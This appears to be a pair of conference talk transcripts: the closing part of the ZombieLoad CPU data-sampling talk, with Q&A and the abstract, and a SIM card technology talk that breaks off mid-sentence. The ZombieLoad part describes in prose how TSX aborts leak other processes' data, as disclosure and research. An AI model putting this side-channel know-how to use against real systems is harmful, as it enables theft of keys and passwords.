normal numbers like everyone else. And if we go back to this, we have this meltdown setup, and then we have the certain condition setup with double mapping of one page. But this is so complex. Yes, it was too complex for you, so you simplified that. I didn't understand it when I came back from holiday. That's no joke. So you suppressed all the exceptions with TSX? Yes. Transactions, so you don't see any exception there. And then you decided to say, oh, you have two mappings to one page. Why do you need a kernel mapping? I mean, it's the same physical address, so I can just use one address. Yeah, you use the same address here. And then I wrote that in four lines. And it works. And it works. Well, that's bad. Use the transaction abort here that can happen with data conflicts in TSX. Many different ways. Exhaustion again, if you use too much data there. Certain instructions like IO on syscalls and synchronous exceptions that can also abort a transaction there. Yeah, and Intel also gave out a statement that asynchronous events that can occur during a transactional execution, if this happens and leads to a transactional abort, this is a, yeah, this is, for instance, an interrupt, then this might be a problem. So what is really happening? Because in the code, we just access one address we allowed to access, and then we end the transaction. So what we do is we start in the transaction. We want to load our first address, which is our mapping address. This will be executed and the value that we read from there, we pass to our oracle to load it into the cache. So this is executed. If it returns the value, we access the address in the cache and the transaction ends. And everything is fine. So why does this leak? Like Daniel said, with asynchronous abort, which we do not cause by our own code within our transaction, something can go wrong. So in this case, when we start loading this address, and this is still happening, at some point in time, an interrupt can occur, like an NMI. And when this happens, this transaction has to be apported. And now the load address, the load execution also needs to be apported. And now picks up a stale value from the line fill buffer, for instance, from the load boards, and leaks that, which we then can recover. But this is a bit slow, because we need to wait for an NMI to occur, hitting the load execution at the right time. So what we now do is, as in the previous variants, we use the flush instruction, because there we induce a conflict in the cache line. So what is happening now, we dispatch the flush instruction, we start our transaction, we start our load, and executes it. This induces a complex situation, which causes the transaction to abort, allowing to leak with our load, which is now faulting to our Oracle to recover our data. And this is really nice, because this variant too now only relies on TSX. No complicated setup, nothing anymore, so as long as you have TSX, you can leak data. OK, but how fast is this? Is this now better? Yes, this is really nice, because now this is really fast. You get up to 40 kilobytes per second. That's already a lot faster. Yeah, and we can really use that to spy on something. Wait a second, if it's that fast, could you leak something with a higher frequency? Yeah, like a song. A song, yes. Maybe we can leak a song. But you didn't like the song though, right? No, no, I made it a bit faster. Faster? Sure. So... We can't see it though. I know, it's just a song. Come on, sounds better. No, this does not sound... No, no, it's not working. And what do you want to do with that now? You want to leak this. Yes. I'm going to play that with a muted player. Okay, with a muted player. With a muted player, and then I run some below at the same time. You still can't see anything. Yeah, I know. And then it should be able to pick up all the things I play. Okay. And then we get... And play that live. I mean, you said there's a lot of noise for this attack, right? So it will be very noisy then. So I can play here. Okay. And I can leak here. Let's see, it might be a bit noisy. Let's see if it works. Yeah, it sounds a bit like a metal version of it. But you can imagine... I think we can sell this as the zombie load filter. Yes. Yeah. It's really great. I think it's a great version if you spy on a Skype call like that. So you can still understand the future. Yeah. It works. So for the timeline, we reported zombie load on April 12th, and then on April 24 we reported variant 2. And we showed that it works on a new CPUs. That shouldn't be vulnerable anymore. Yes. That was just before the embargo ended. Yeah. That was fun. Yeah. And then we had an emergency call. Another embargo. A call on set up there. Yeah, without this variant, of course. Yes. Which was quite funny because we had these if-defs in a tech code of the paper and just moved this variant. On the same day when zombie load was disclosed, the new MDS-resistant CPUs came out. So you can actually buy them. Yes. We also reported on May 16 that the VRW and software sequences are insufficient. There's still some remaining leakage. It still makes attacks a lot harder. But yes. We also Intel documented this. So this is... Yes. And only last month the variant 2 was disclosed. Yeah, we had the public disclosed. Oh, yeah. Right? I always wanted to be on a movie poster. Yeah. But where am I actually? Here. Oh, no. I don't know. But actually, so the process with Intel improved quite a lot over the last year. They invested a lot of effort into improving their processes. And I think by now I'm really happy to work with them. And I think they are also quite happy because they sent us a beer. And we were so happy about that and excited. And we didn't have time until last week. And then we finally had the beer. And that was also very nice. Anyway. But wait a minute. So the TAE attack, the variant 2 is just TSX over leak gadget. Yes. Like I said earlier, when you go back one year, we had some slides at Blackhead again. Yes. Where we had this code. And if I look at this code, it looks the same as before. It looks the same. Yes. Just without the flush. So if I just wait, I leak. But this is basically just our code from GitHub. We had this on GitHub. And on the slides for one year. Yes. And it was described in the Meltdown paper. Yeah. Hmm. Yeah. Not good. No one tries our POCs on GitHub. Yes. Maybe you should also fix that. I mean, it's really easy, right? What about the mitigations? Yeah. If you don't have TSX anymore, then you can't have the TSX support. So super easy fix, right? No, no, no. You're kidding. No, actually, that's one of the mitigations. You can just disable Intel TSX. And that's the default after the latest microcode update. Where when you try to run the attack again, it doesn't work. And then you have to figure out some performance penalty. Yes. But on the other hand, we also have VRW to overwrite the effect that buffers as before. But unfortunately, they do not work reliable. Also not the software sequences. So under certain conditions, you can still get leakage despite having these mitigations. But this is, yeah. Yeah. So but this was clear. Can we get any insights from that? I mean, so for Zombieload, it again falls into this category. We have transient execution attacks. It's a meltdown type attack. It uses folds there. You can classify the different variants on the fold they use. So we have the spanish fold for variant one. We have the microcode assist, this microarchitectural folds for variant two and variant three. One is the TAA, the TSX support, which is not a visible fold, but a microarchitectural fold and also the microcode assist for this excess and dirty bit. And as we've presented last year, we put this up on a website like transient.fail. So you can play around with that, see what kind of attacks have been explored already. Yes. Nalala inside is here. So we had this memory based side channel attacks for quite some years now where we look at addresses and then you see the addresses accessed or not. We can infer the instruction pointer. Then we had this meltdown attack where we had an address and we actually got the data from this address was completely new. And this looked like a bit different. And now with this data sampling with some below here, we have the missing link here between that, because now we know when we had this certain instruction pointer, then we get the data. So we can't specify the address of the data we want to leak, but a certain instruction pointer, we simply get the data. And we've seen some nice triangle that combines all these things and gives us more powerful primitives. So what are the lessons that we've learned? So when Meltdown and Spectre came out for us, it was like Spectre is here to stay. That's a long program problem we have to take care of. And for Meltdown, everything is fixed. But by now we've seen much more Meltdown type attacks than Spectre type attacks. Yes. So we were wrong in that assessment. If you want to play around with that, so everything is also on GitHub, all the variants, so you can try yourself, see if you can reproduce that and build your own nice Sombeload music filters or stuff like that. And also in 2019, there were other papers in the same space. There was the Fallout paper and the Riddle paper, which also presented attacks in this area. So to conclude our talk, trends in execution attacks are now the gift that keeps on giving. Yes. And as we have seen, this class of Meltdown attacks is a lot larger than previously expected. So we thought like it's only one, but we now have several Meltdown type attacks that we know. There might be more. Yes. The cues are deterministic largely. There is no noise. If you see noise, then usually it means it's data from somebody else. And now do we still have time for the remaining part of the song? I'm sure you'll meet us somewhere later. Go on Loathe Forever this way It's not safe with these loads And my Lord will go on Forever Some time left for questions, so please line up at the microphones if you have questions. We have questions from the internet. That's really nice. Signature please. Can users recognize attacks with power monitoring tools, CPU frequencies, memory IOPS or other free accessible tools? I don't think there is a tool tailor to detect those attacks. Certainly you would see with the current POX that we have, you would see a significant CPU utilization and probably also a lot of memory traffic. Other than that, so there are no dedicated tools so far. But also I think it's better to just patch these vulnerabilities than to try to detect them. Thank you microphone 4 please. In the timeline we saw that you reported variant 2 at the very end. You already had variant 1 and 3, so why the bizarre numbering? So we actually had variant 2 right in the beginning when we reported it, but we only discovered very briefly before the embargo ended that it actually behaves a bit differently. So there are two key moments. In April we reported variant 1 and 3 and then two weeks later on April 24 we reported variant 2. But for Cascade Lake we really wanted to buy a CPU, but the university budget is limited. So few days before the embargo ended I ordered one online to test it. Also the CPU wasn't available before that. Yes, so that was apparently an accident of the cloud provider. We suspect that we should not have been able to actually buy one before May 14. Yes, because that was the announcement of the CPU. When we were able to mount the attack on Cascade Lake, which they assumed is not affected by MDS type attacks, things got busy again because now we have an embargo ending in four days and there's a new variant that still is capable of leaking data on the new CPUs that they have. So previously none of the POCs showed that there is a difference in the micro-architectural behavior between those variants so that the TSX transaction, the S-Inchronous Abort, behaves differently was only known at that point. Okay, question answered. Do you still have one more? Okay, thank you. We have more questions from the signal engine or somebody lining up at microphone 1 please. Can you ask, do you have any other embargo going on right now? I don't know. Alright, so I don't see any other people, any other guys lining up at the microphone. So thanks again, a warm round of applause for those three guys. Thank you.
The ZombieLoad attack exploits a vulnerability of most Intel CPUs, which allows leaking data currently processed by other programs. ZombieLoad is extremely powerful, as it leaks data from user-processes, the kernel, secure enclaves, and even across virtual machines. Moreover, ZombieLoad also works on CPUs where Meltdown is fixed in software or hardware. The Meltdown attack published in 2018 was a hardware vulnerability which showed that the security guarantees of modern CPUs do not always hold. Meltdown allowed attackers to leak arbitrary memory by exploiting the lazy fault handling of Intel CPUs which continue transient execution with data received from faulting loads. With software mitigations, such as stronger kernel isolation, as well as new CPUs with this vulnerability fixed, Meltdown seemed to be solved. In this talk, we show that this is not true, and Meltdown is still an issue on modern CPUs. We present ZombieLoad, an attack closely related to the original Meltdown attack, which leaks data across multiple privilege boundaries: processes, kernel, SGX, hyperthreads, and even across virtual machines. Furthermore, we compare ZombieLoad to other microarchitectural data-sampling (MDS) attacks, such as Fallout and RIDL. The ZombieLoad attack can be mounted from any unprivileged application, without user interactions, both on Linux and Windows. In the talk, we present multiple attacks, such as monitoring the browsing behavior, stealing cryptographic keys, and leaking the root-password hash on Linux. In a live demo, we demonstrate that such attacks are not only feasible but also relatively easy to mount, and difficult to mitigate. We show that Meltdown mitigations do not affect ZombieLoad, and consequently outline challenges for future research on Meltdown attacks and mitigations. Finally, we discuss the short-term and long-term implications of Meltdown attacks for hardware vendors, software vendors, and users.
10.5446/53170 (DOI)
So our next talk is SIMCARD technology from A to Z and it's an in-depth introduction of SIMCARD technology that not a lot of people know much about. And our speaker, Harold LaForge, as he's better known, is the founder of the open source mobile communications project. He's also a Linux kernel hacker. He has a very long and impressive bio and the Wikipedia page. Just means I'm old. So Harold, please give him a round of applause. SIMCARD technology from A to Z. All yours. Thanks a lot for the introduction. As you can see on the title slide, I actually had to change the title slightly because I couldn't find a single acronym related to SIMCARD that starts with a Z. Now it's from A to X, not from A to Z anymore. So SIMCARD technology from APDU to X-RES, which are two acronyms in the context of SIMCARDs which we might get into or not. So what are we going to talk about in the next 45 or so minutes? What are the relevant specifications and specification bodies? What kind of interfaces and protocols relate to SIMCARDs? We're going to talk about the file system that exists in such SIMCARDs as well as the evolution of SIMCARDs from 2G to 5G. So that's basically from what, 91 to 2018. We will talk about SIM toolkit over the air, a little bit about eSIMs as well, the embedded SIMs. Introduction about myself was already given. So yeah, people complained sometimes that my slides are full of texts and I need more diagrams so I tried to improve. So this is actually at one night I thought, okay, let's actually try to create a dotty graph of all the specs and how they cross-reference each other. And this is what I've come up with. And this is only the SIMCARD relevant specs, not out of context other specs that they may refer to. So yes, it's an interesting graph. The arrangement was done automatically by dotty, so don't complain to me about that. Yeah. Nevertheless, I will switch back to text and we will look at what kind of specifications there are in spec bodies. So most importantly, probably about any kind of chip card technology, we have the ISO, the international standardization organization, which has a series of specifications about what they call ICCs, which is integrated circuit cards. We also have the ITU, the International Telecommunications Union, which has a series of specs related to telecom charge cards. The title implies that this is things that came before SIM cards. So we're talking about the cards you put into pay phones and things like that in the 80s. There's of course the 3G, sorry, there's of course Etsy, the European Telecommunications Standardization Institute, which is the entity where GSM was originally specified. GSM being the first digital telephony system that used SIM cards, the best of my knowledge at least, not a historian though. There's 3GBP, the third generation partnership project, which is where the GSM specs have been handed over to in the preparation of the 3G specification process because Etsy is a European entity and Chinese companies, for example, or Chinese government cannot participate there or Americans even to the extent that European companies can do so, it was lifted to an international new group called the Third Generation Partnership Project. And they of course inherited all the SIM card related specifications. And then we have non-telecom standardization entities such as the global platform card specification. This global platform is a body that specifies lots of aspects around Java cards, specifically around applet management installation and so on, on Java cards, which brings us to the next entity which is not really a standardization body, but it's a private company that used to be called Sun and now it's part of Oracle, which defines the Java card API runtime and the virtual machine of Java cards. Last but not least, we have the GSM association, which is the vendor club of the operators that doesn't really have to do that much with SIM cards until the eSIM, where then suddenly the GSM A plays a big role in the related specs and technology. So talking about the standardization bodies, what is the SIM actually? Well the SIM is the subscriber identity module. Probably anyone in here has one, likely more or at least has had. It's quite ubiquitous. Every device with cellular connectivity during the last whatever, 20 or so years, has a SIM, whether it's an actual card or whether it's sold at in these days. And SIM card hacking has a tradition in the CCC since at least 1998. I'm not sure how many people remember. There was the Vodafone Germany SIM card cloning attack back then. In Germany it was titled from von Dezwey Privat zu Dezwey Pirat. And that was an attack that used weaknesses and sort of brute forcing against the authentication mechanism to recover the secret key which is stored in the card. And then you could clone SIM cards back then. That was then fixed in subsequent technology generations. And also around that time you can find on the FTP server of the CCC a SIM card simulator written in Turbo-C using a season card. I'm not sure how many people remember season cards. These were cards people used in the context of cracking satellite TV encryption. So meanwhile of course the SIM technology stack has increased and the complexity has increased like probably in any kind of technology. So let's recap basically from the beginning to today what SIM cards are and what they do in some degree of detail. If we start historically with SIM cards actually the predecessor to the SIM cards that we know is the chip card used in the CNETs which is an analog telephony system that used to operate in Germany. There's actually an open source implementation these days as part of OsmoCom Analog. If you're interested in that do check out Jolly at the vintage and retro computing area. And before 1988 they only had magnetic stripe cards but in 1988 they introduced integrated circuit cards in this analog telephony system and in GSM it was a chip card from the beginning. The concept of the SIM card means you store the identity of the subscriber outside of the phone which is very opposite to what happened in the CDMA world in the US around that time where it was basically inside the phone itself but having the identity separate of course enables all kinds of use cases that were relevant at that time. We will get to that to some extent. In addition to the identity and the identity in this context means a cryptographic identity. There are all kinds of network related parameters that are stored in the SIM card. Some of those are static meaning that they are provisioned or written by the operator into the card or of course by the SIM card manufacturer on behalf of the operator but which are not writable by the user that affect access control classes which means like are you a normal user or are you an emergency service user which needs higher priority to access the network things like that. And there are lots of dynamic parameters on the card and dynamic means they get rewritten and changed and modified and updated all the time. That's for example the TIMSI, the temporary identity that gets allocated by the network every so often. Also the current actual interface encryption key like KC and its successors in modern generation technology. So they get updated and written all the time by the phone. Some of the files are even updated and written by users at least traditional or historically like the phone book and the SMS that are stored on the card. It was originally specified as a full credit card size cards and it was intended to be used in radios in rental cars or company shared cards. So basically when you leave the car you would remove your SIM card, the full size credit card size card and somebody else would put their card in. And allegedly they even were I think public GSM phones installed in German trains where you could plug in a SIM card or something like that but I personally haven't witnessed that since I was ignorant at that time apparently of that fact. So let's get to the mother of all smart card specs which is in German Dean in ISO IHC 7816 or short chest ISO 7816 and maybe an anecdote how these specs come around. So there's like the ISO that specifies a certain spec. It gets an ISO number and then EN the European norm whatever body comes around and says oh we will elevate this international spec into a European standard and they put an EN in front and then Dean the German standard body comes around says oh we will elevate this European norm into a German norm and we will put a Dean in front. So now in Germany we have Dean in ISO IHC 7816 and if you get the actual copy from Dean it's quite funny. I didn't don't have it here but actually you get a one page additional paper on top which translates the key technical phrases from English to German and that's the added value that you get from it become sorry I mean it's just hilarious. The entire spec is in English but then there's like this key translated terms so you know that file means that I for example that's extremely beneficial to the reader of such specifications. Anyway so the title is integrated circuit cards with contacts. I wonder okay they are contact less now but at least back then certainly they didn't exist and it has 15 parts by now the most relevant parts are one through four starting from the physical characteristics going to the mechanical dimensions and the location of the contacts of course it's a separate part of the spec and each of those specs are sold as a separate document of course. So the physical size you pay and if you want to know location of the contacts you have to pay to get another spec. Then there's part three which covers the electronic signals and the transmission protocols we will look at that in some detail and then there's part four which is the inter industry commands for interchange which I find very interesting and I always thought they should have made the international inter industry commands for interworking information interchange but apparently they didn't come up with that and of course this all predates the internet so there's no internet in there. The next relevant spec is GSM technical specification 11.11 very easy to memorize that number which is the specification of the subscriber identity module-mobile equipment interface. So in GSM there is what's called a mobile station which is your phone and it's comprised of two parts the mobile equipment which is the hardware and the SIM which is the SIM next to the mobile equipment. And interestingly it doesn't just refer to these ISO specs that I mentioned before but it actually repeats like more or less carbon copies large portions of these ISO specs with some amendments or corrections or extensions and again it gives you the location of the contacts and the mechanical size of the card and the electronic signals and the transmission protocols and so on. But beyond these ISO standards it also actually specifies what makes the SIM a SIM and not any other contact card which is the information model, the file system on the card and the commands and protocols that you use on this card. And last with typo as usual on my slides but not least of course how to execute the GSM algorithm to perform cryptographic authentication. The physical smart card interface is interesting. I mean if you've worked with hardware or electronics or serial interfaces I think it's rather exotic and exotics always means interesting. So we have four relevant pins, we have a supply voltage not surprisingly, it can be 5.3 or 1.8 volts, interesting it's not 3.3 volts, it's 3.0 volts nominal, not sure why but anyway that's how it is. We have a clock line that provides a clock signal which initially needs to be between one and five megahertz so the phone provides power and clock. We have a reset line which also makes sense, you want to reset the card and then we have one IO line for bi-directional serial communication. So you have RX and T sharing one line and there is some nice diagrams about how exactly the sequencing happens when you power it up, nothing really surprising. There's an activation sequence and after the card is activated the card will unilaterally send what's called an ATR, the answer to reset and that's just a series of bytes which gives some information about the card capabilities, what protocols, what voltages, what clock rates beyond these initial activation ones are supported. Now after we've powered up the card we have the bit transmission level and it's actually very much like a normal UART if you ever looked at RS232 or another UART serial port, rather simple start byte, stop byte, parity, serial bit transmission. What's a bit interesting is that we have a clock and the board rate is divided from that clock but it's still an asynchronous transmission so there is no phase relationship between the clock signal and the board rate that the data uses which lots of people get wrong, particularly lots of authors of AdMail microcontroller data sheets which claim that it's a synchronous communication which it is not. So the direction changes every so often to have acknowledgments back and forth and to exchange data in both directions and interestingly a lot of the timings are not specified very well but I guess nobody cares about that other than if you want to implement a card reader which I happen to have gone through this year. Smart card communication. After we are able to transmit bytes between the card and the reader we have something called APDU, the application protocol data unit specified as for that ISO 7816-4, that's the inter-industry commands for interchange. And an APDU consists of a couple of bytes. There's a class byte that just specifies the class of command, there's an instruction byte which specifies the specific instruction like reader file, writer file. We have some parameter bytes whose meaning is relevant or specific to the instruction. Then we have a length of a command and command data, we have an expected response length, response data and last but not least a so-called status word. And the status word basically the card tells whether the execution was successful or whether there was some error and what kind of error there was and things like that. The APDUs are then split into a lower layer transport protocol which are called TPDUs. There are two different commonly used protocols and two specific ones that are used in the context of SIM cards or specified in the context of SIM cards, that's one called T equals zero which is most commonly used with SIM cards. Actually, I've never seen anything else but T equals zero used but T equals one is another protocol which according to the specs every phone needs to implement and the card can choose if it does T equals zero or T equals one. As again, I've never seen a card that does T equals one or at least that does only T equals one but the specs would allow that. T equals one is more used in banking and crypto smart cards. The difference mainly is T equals one is a block oriented transfer and T equals zero is more a byte oriented transfer. T equals one has the advantage that it has CRC and checksumming so you get more protection against transmission errors which you don't have in T equals zero. The APDU gets mapped to TPDUs, details I'll skip here and this is just some examples so you get an idea how this looks like. We have A0, A4, 0, 0, 0, 0, 0, 2, 3, F, 0, 0. The A0 here is the class byte and A0 is SIM card class. A4 is select file so you're selecting a certain file on which you want to operate. Two parameter bytes are zero. Zero two is the length of the command and then you have two bytes of that length 3F00 which is basically your slash, your root directory. You want to change to the root directory of the file system is basically what that command says and one hypothetical response is just a status word 900 which means success. Selecting a file. So we have a file system on the card. Most smart cards do that. It's not a file system in the context like you have a USB drive that you can mount where you just have a block abstraction or something but the smart card file system itself runs inside the card and you just talk to the file system and give it instructions. So if you want to find an abstraction in PC technology it's more like MTP or PTP over USB where you don't have a block device but you talk to another processor which manages a file system and you can instruct it's like a remote file system access. You have some similarities to normal file systems. I mean there's a master file which corresponds to a root directory in PC file systems. You have so-called dedicated files which are subdirectories and you have so-called elementary files which are actual data containing files as we know them. Beyond that there are lots of specifics that we don't find in PC file systems where operating system file systems we have what's called a transparent EF. That's an opaque stream of data like a normal binary file on any random operating system but then we have concepts like a linear fixed EF which contains fixed size records and you can seek basically get me the 15th record in that file and the file has a record size of whatever 24 bytes for example. And then you have something called a cyclic EF where they have a ring buffer of records and you have incrementable files which contain monotonically incrementing counters and things that were apparently important for charging or things like that. Each file has access control conditions that define who can read and or modify and or well there's no delete but there's something called invalidate the file and who is basically expressed in context of which PIN was used to authenticate that entity which performs the operation. So as a user you have a PIN 1 and some people will remember you also have a PIN 2 that probably nobody's used since the 90s and the operator has something called an ADM PIN, administrative PIN which gives better or higher privileges in terms of file system permissions on those files. The kind of commands we see well select file from the example. We have read record, update record, I guess I don't need to say anything about that. The read binary, update binary and then we have commands like CHV commands where CHV is the card holder verification which is Etsy language for a PIN. Not sure why they don't call it PIN. So they change PIN, disable PIN or enable PIN commands which is actually what your phone performs if you say you disable the PIN or you change the PIN then exactly those commands are issued to the card and last but not least run GSM algorithm. But this is still the 2G only sim. We haven't yet gone beyond 2G yet at this point in the slides. And that's actually not that many more. That's really it. Now let's look at the file system hierarchy. We have the MF, the root file system and then we have something called DF telecom and the hex numbers in parenthesis are the identifiers that are actually used on the protocol level. We have something called DF GSM which is the GSM directory containing GSM related parameters and EICC ID where ICC ID is the card unique identifier that's stored on the card. And if you expand that into more details you get these kind of graphs and this is what actually taken from one of the specs. And you see there's also an iridium directory or whatever that one was. The global star directory and all kinds of people operating different telephony systems have basically their own directories in that scheme. But on GSM we find those two mainly maybe some sub directories. So when 3G came around something happened. As I said the specifications were shifted from et C2 3G VP but of course chip cards in the context of telecom have use cases outside of cellular telephony. So actually the specs were split in that area. So there's something new called the UICC the universal integrated circuit card because the previous one was not universal apparently. And that part of the specs remained with et C and continues to be developed and there is the use him application on top of the UICC which is what specifies the 3G VP relevant part and that gets implemented in something called an ADF and application dedicated file ADF use him. And ADF you can also select or enter using a select command similar to a normal DF. The difference mainly is that the identifiers are much longer. That's other details but from a user point of view that's how it looks like. So we have a split of the core universal ICC and on top and use him application. And if you have a SIM card that can be used with 2G and with 3G then you basically have the classic SIM card. And in addition you have a use him application on the card. And actually there are some cards that only work with 3G or later technology and don't have 2G mode because the operator doesn't have a 2G network. So you only have a use him application and you don't have the classic SIM anymore on the card. When 4G LTE came around actually there was no strict requirement to change anything in the SIM card and you can just use a normal use him a UMTS 3G card on LTE networks. It's the same authentication and key agreement mechanism. They have added some additional files that are completely optional and mostly like optimizing some bits and some optional new IMS application. IMS is the IP multimedia system which is 3GPP language for voice over IP or Volte. So IMS is the IP multimedia system which is what is used to implement Volte where Volte is not a specification term but more a marketing term. And this optionally on the SIM card you can have an I-SIM application which stores parameters relevant to the IP multimedia system such as SIP user identities and SIP servers and things like that. And if that I-SIM application doesn't exist there is a fallback mechanism by which the identifiers are computed based on the IMZ and so on and so on. So it's not really necessary to have a specific 4G SIM but it's possible to have that. Once we go to 5G, 5G actually reuses the existing 3G and 4G use him cards. Again some new optional files have been introduced and there is one feature which I guess everyone in here wants to have which would require a new SIM card or a changed SIM card which is that the SUCI, the subscriber concealed identifier, can be computed inside the SIM card or by the phone. And if it's computed inside the SIM card then the SIM of course has to have support for doing that computation and that is something that needs explicit SIM card support. In absence of that everything else you can use an existing 4G SIM card even on 5G networks. Nothing really changed there fundamentally. Okay, now looking at the cards more on the physical side and from the hardware and we will look at the software, the operating systems and so on and the various things you can do with SIM cards later on. We have of course a processor core, many different vendors and architectures, traditionally lots of 8051 derivatives inside smart cards. These days we also actually find a lot of fragile bit ARM cores, quite often so called SC cores. There is an SC000 and SC100 and SC300 and SC is for secure core. So it's not a normal CoreTXM core or something like that but it's a secure core and it's so secure that ARM doesn't even disclose what is secure about it other than it is secure. So the documentation for sure is securely kept away from anyone who would want to read it. So for these chips, the smart card chips used in SIM cards or generally smart card chips themselves, often you cannot even find a simple one page data sheet which tells you the main features. Even that is already under NDA. You have built in RAM and built in ROM, at least a boot loader normally but possibly also the OS or parts of the OS but that is increasingly uncommon. So modern cards, most of them only have flash and the entire operating system is in flash so you can update everything. And then applications on top of that and we will look at applications later when we talk about the software. And unfortunately, contrary to the crypto smart cards where it's possible to have higher prices and therefore have rather expensive products. SIM cards are mostly selected purely by cost these days due to the prepaid boom. It was different when GSM was introduced. If every subscriber has to get a subscription and there's going to be hundreds of euros or marks or whatever in revenue, then you can invest a lot of money in a SIM card but prepaid cards that get thrown away on a daily basis, you can only pay cents for the card and then you need to pay another couple of cents for the Java card, for the Java VM patent royalties and so on and so on but basically you cannot afford to pay money for SIM cards anymore. So that also explains why a lot of SIM cards today, even though it's technically available, they don't have hardware crypto but they actually implemented in software because it's cheaper. And then of course, yeah, well, you have time of execution things and whatnot. So in terms of software, you have a card operating system, cards that don't have an operating system are memory cards which are not sufficient for SIM card use cases. In the crypto smart card area, the operating systems are typically well known and documented to some part at least. In SIM cards, it's slightly different. So almost nobody ever mentions what kind of operating system is on the SIM card. Even the SIM card vendors, it's not something they would put on their marketing or on their homepage or something, what exactly kind of operating systems are on there. The SIM card operating system also from the cellular network point of view is an implementation detail because all the relevant parts are specified standardized interfaces and what operating system people use on the card, operators choice, it doesn't really matter from that point of view. In early SIM cards, I presume they were rather monolithic so you didn't really have a separation between operating system and SIM application. Today the software has become more modular. We have this abstraction between the operating system and applications. And traditionally, even when that separation already existed, the operating system was very hardware dependent, non-portable, and the applications were very OS dependent and non-portable. And that has changed a bit due to the introduction of Java cards into the SIM card area, which is not required. There's no requirement anywhere that the SIM card must be a Java card. But in practice, most SIM cards are Java cards because they have certain at least perceived advantages and other norm by now. The Java cards themselves have been independently developed of SIM cards. Of course, Java is a sun technology, so sun is behind that. And the first actual cards were produced in 1996, so much later than SIM cards came out by Schlimberg, which is now part of Jemalto. And yeah, we have redundant lines in this presentation. So the Java cards, most of them implement the global platform specifications, which then specify when the independent management of the cards and the applications on it. And the Java that you use to write such cards don't ever think it is real Java. I mean, if you show that to any Java developer, he will probably disappear very quickly. So if a very weird constrained subset of Java with a special on-card virtual machine, which is not a normal virtual machine, you have a runtime environment that's not the normal runtime environment, you have a special binary format, which is not a JAR file. And the idea is that you have portability of card applications, which makes sense, of course, but one could have done that with whatever other standards as well wouldn't necessarily need a virtual machine for that. Yeah, as I said, there's no functional requirement that a SIM card must be a Java card, but in reality that's the case. I think the portability is the driver here. So if an operator develops some application that runs on a SIM card, you know, every year or so they do a new tender or they have a new SIM card supplier or something like that, they want to run their application on the current and the future and the next future future SIM card and not rewrite all of that from scratch or have that rewritten from scratch all the time. And interestingly, both 3GPP and Etsy specify Java APIs and Java packages, which are specifically available on Java cards that also are SIM cards. So you basically have SIM card specs and you have Java card specs and if you have both of them together, you also have SIM card Java API specs for what kind of additional API applications on the card can use in order to affect SIM relevant aspects of the card. Which brings us to one of the strange historic developments called SIM toolkit or later card application toolkit, which is sort of an ability to offer applications with UI and menu on the phone, right? I mean, the card, of course, doesn't have any user interface, but the card can sort of request like show a menu and offer multiple choices and things like that. Some people will have seen it on some phones, you have this SIM toolkit menu somewhere and I mean, I think in Germany never really took off much in terms of actual applications. I mean, you could probably subscribe to some very expensive premium SMS services if you were really bored. But in other regions, this has been very successful and very, I can say, had a real impact on society. Kenya is always the, I think, the prime example for that where MPSA, the mobile payment system implemented at least initially based around card application toolkit applications basically overtook the banking sector. At some point, everybody did their wire transfers that way, even people who didn't even have a bank account and it basically replaced or substituted large amounts of the everyday banking needs of people. So there are exceptions. Some additional instructions that we have in terms of APDUs, details, I'll not look into these. The next step after SIM toolkit is the so-called proactive SIM. If we look at the SIM card communication as it is specified or smart card communication in general, it's always the reader in this context, the phone that sort of sends an instruction to the card and the card responds. So the card is always the slave in the communication and it doesn't have any possibility to trigger something by itself. And that was sort of worked around by the proactive SIM specifications where a command or a request from the card is piggybacked into responses to the commands from the phone to the card. And then basically the SIM card can request the phone to basically poll the card every so often. So the phone can ask, well, do you have a new command for me now? And the card can say yes or no. And this way they work around this restriction. And it's not only polling that can be requested, but it can be event notifications and event notifications can be loss of network coverage, registration to a new cell, opening of a web browser, and like, are you making a mobile-originated call? Are you sending an SMS, whatnot? So all these kind of events can be sent to the SIM card so that the SIM card can do whatever with it. I think there are not many useful applications beyond steering of roaming or roaming control by basically depending on where you register and what kind of cells you have and even the measurement reports on what is the signal strength that can be fed into the SIM card which then can basically decide what to do. But yeah, I think it's all rather exotic and very few like relevant or good use cases of this. The next step is over-the-air technology, OTA, which is the ability for the operator to transparently communicate with the SIM card in the field. The traditional non-OTA-capable SIM card, the operator of rights or the SIM card manufacturer of rights at manufacturing time, at so-called personalization time of the card, and then it's with the subscriber. And if the operator ever wants to fix something or change something, then they have to send a new plastic card. With over-the-air, they can be updated. It's based on proactive SIM technology and there are many different, by now many different communication channels. How some backend system at the operator can interact with a card inside the phone of the subscriber. The classic channel is SMSPP, which is the SMS as you know, which just officially is called SMS point to point. It's also possible over SMSCB, the cell broadcast SMS, which I find very interesting, bulk updates to SIM cards via cell broadcast, which also would mean that they all have a shared key for authenticating these updates. But well, it's also specified for USSD from release seven onwards of the specs and then there's something new at that point called BIP, the Bearer Independent Protocol that works over circuit switch data and GPS, some spec numbers if anyone is interested, and now since release nine, that means sort of since LTE is around, also over HTTPS. And I'll get to that in a couple of separate slides. There's actually a TLS implementation in SIM cards these days, believe it or not. So the cryptographic security mechanisms that are specified, but of course the detailed use is up to the operator. So the operator may choose whether or not to use measured authentication or whether or not to use encryption or whether or not to use counters for replay protection. And this is basically one area where a lot of the security research and the vulnerabilities published the last whatever decade or so have been happening, that cards were not properly configured or they had implementation weaknesses or you had sort of oracles that you could query when interacting with those cards as a attacker. One of the use cases over the air is RFM. It's not RTFM, it's RFM, remote file management was introduced in release six and the number of typos is embarrassing. Common use case over the air, it allows you to read or update files in the file system remotely and that you can use for example for the preferred or forbidden roaming operator list that's a very like legitimate use case for that. There's also an ancient example that I always like. I think Vodafone Netherlands once advertised that the operator can take a backup of your phone book on the SIM card. Yeah, I think it's an early manifestation of cloud computing before it even existed. In any case, yeah, certainly a feature that everyone in here would like to have. Of course, it's irrelevant by now because nobody has contacts on SIM cards anymore. The next is RAM, which is not random access memory. No, it's remote application management was also introduced in the same release with the same typo and it allows installation and or removal of applications on the card and applications in terms of Java card then means Java cardlets. For example, you could update or install new multi-IMSI applications, which is one very creative way of using SIM cards in more recent years or new SIM toolkit applications, for example. The IMSI application in case somebody hasn't heard of that yet is basically a SIM card that changes its IMSI depending on where you currently roam in order to do sort of least cost roaming agreement for the operator. Because if he uses his real own IMSI, then maybe the roaming cost would be more extensive than he uses some kind of borrowed IMSI from another operator that then gets provisioned there, which has a better roaming agreement and it works around ridiculous roaming charges, at least between the operators, of course, not towards the user. Now we get to the sort of premium feature of modern SIM cards, sorry, where, of course, well, SMS, yes, you can still do SMS over LTE, but it's sort of this added on clutch. USSD I think doesn't exist anymore because of the circuit switch feature. 